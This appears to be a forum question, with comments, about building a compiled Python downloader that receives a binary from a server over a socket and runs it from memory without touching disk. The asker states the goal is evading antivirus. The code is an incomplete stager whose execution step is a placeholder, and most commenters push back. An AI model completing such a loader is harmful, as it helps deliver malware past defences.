# Exeucute binary from a variable in Python

Tags: python

So I'm trying to make a fileless code that will be downloaded using a downloader in Python that will download the binary directly to a variable from the server and then execute it. My first plan was to download the code in Python and then use the `exec()` method but the problem is that I need the downloader code to be compiled using Pyinstaller and the whole thing should work without even having Python installed on the machine.

My script looks something like that:

```py
import socket
import time

port = 5353
connected = False


def connect():
    global connected
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while not connected:
        time.sleep(5)
        try:
            s.connect(("server.local", port))
            connected = True
            print("Connected!")
            connection(s)

        except IndexError:
            pass


def connection(s):
    bin = s.recv(1024*8)
    print(bin)
    <run the executable>


connect()
```

Comment: Do you want to replace your code so that you do not require python? If you just want to execute a binary from memory placing it into a temporary directory and running it would be an option. This is of course a little bit problematic regarding security and compatibility.

Comment: @voidpointercast no, the above script will also be compiled and will download directly to RAM the other executable. Downloading it into a temporary file is a bit problematic.

Comment: (Running a pyinstaller executable _creates a bunch of temporary files_, so you can't use it in a fileless way; your code might be fileless, but pyinstaller itself isn't)

Comment: @CharlesDuffy Yeah I'm going to compile it on my server, not on the client. Also I'm going to run it on Windows computers that should not have any tool nor interpreter installed.

Comment: (also, pyinstaller doesn't really "compile" Python at all; it just creates a .pyc bytecode file -- which is trivial to disassemble -- and packs it into a binary alongside a full Python interpreter. This makes it _extremely_ trivial to reverse engineer what went into such an executable -- normally, something folks working on the class of program you're developing don't want).

Comment: ...which is to say, Python as a whole is probably the wrong language for the use case at hand. Think about relying on tools that are already there, like PowerShell.

Comment: @CharlesDuffy You mean to remake the code in PowerShell? This would be a bit complex since I prefer other languages.

Comment: I don't like PowerShell either, but Python is 100% the wrong runtime for what you're trying to do here. You'd be better off writing native C -- at least then you could keep the binary size down.

Comment: As I said above: _Pyinstaller itself isn't fileless_. So using a fileless deployment mechanism to kick off a pyinstaller-built executable buys you nothing.

Comment: Maybe start by reading through https://pyinstaller.readthedocs.io/en/v3.3.1/operating-mode.html#how-the-one-file-program-works -- as it says, when you tell pyinstaller to build everything into a single file, when that file is run it extracts all its contents into a temporary directory.

Comment: @CharlesDuffy Let's say that I'll make it on C++ and then compile only the downlaoder, do you think I could make it run the C++ code directly from a variable? Or maybe even compiling the fileless code as well and then just run binary from the binary downloader.

Comment: To run this script... you need python installed. Why do you need a python script to install python?

Comment: _Code_, not a compiled binary? Really? I mean, there do exist C compilers that are smaller than the Python runtime (see tcc), but why would you make yourself go through that much trouble? (And note that I'm specifying C, not C++)

Comment: @Mous both scripts will be compiled before to binary, this is just the source code.

Comment: (and tcc is not just a C compiler but also a C _interpreter_, so it can definitely run code directly in its own process)

Comment: The other thing here is that the whole class of trick here is something that OS vendors are onto. Provisions against having the same page marked both writable and executable exist _specifically_ to prevent this kind of thing.

Comment: @CharlesDuffy I don't really know a solution, I just want a compiled downloader that will download directly to RAM another code and then run it without being installed on the hard drive (the downloader itself will be installed on the hard drive).

Comment: I strongly, _strongly_ suggest you catch up with the last few decades of security research -- looking at how this has already been done, and what countermeasures have been built to stop it -- instead of trying to invent something from scratch. Start simple, trying to just run some trivial shellcode, before you move on to trying to get anything as complex as a Python interpreter going.

Comment: (you'll have an easier time if this is an academic exercise and you can pick an easy/older/unhardened target like Windows 98; and if it's not... this really isn't the right place to be asking for help).

Comment: @CharlesDuffy It is actually an exercise I'm doing at home. The reason I'm making it this complicated is because I'm trying to avoid anti-viruses in order to do penetration testing. Also I really don't know where else to ask for help, anyways I'll try to maybe remake it in C. Thank you for your help!

Comment: It's extremely nontrivial to avoid an antivirus in this regard, especially the more modern ones, because they've had decades of experience preventing people from doing exactly this. Also, if you are genuinely doing this for educational purposes, I'd look into Advanced Persistent Threat Hacking by Tyler Wrightson, which has live code samples in the appendices. They're outdated and it's 9 years since I last read it, but it should be a good stepping stone.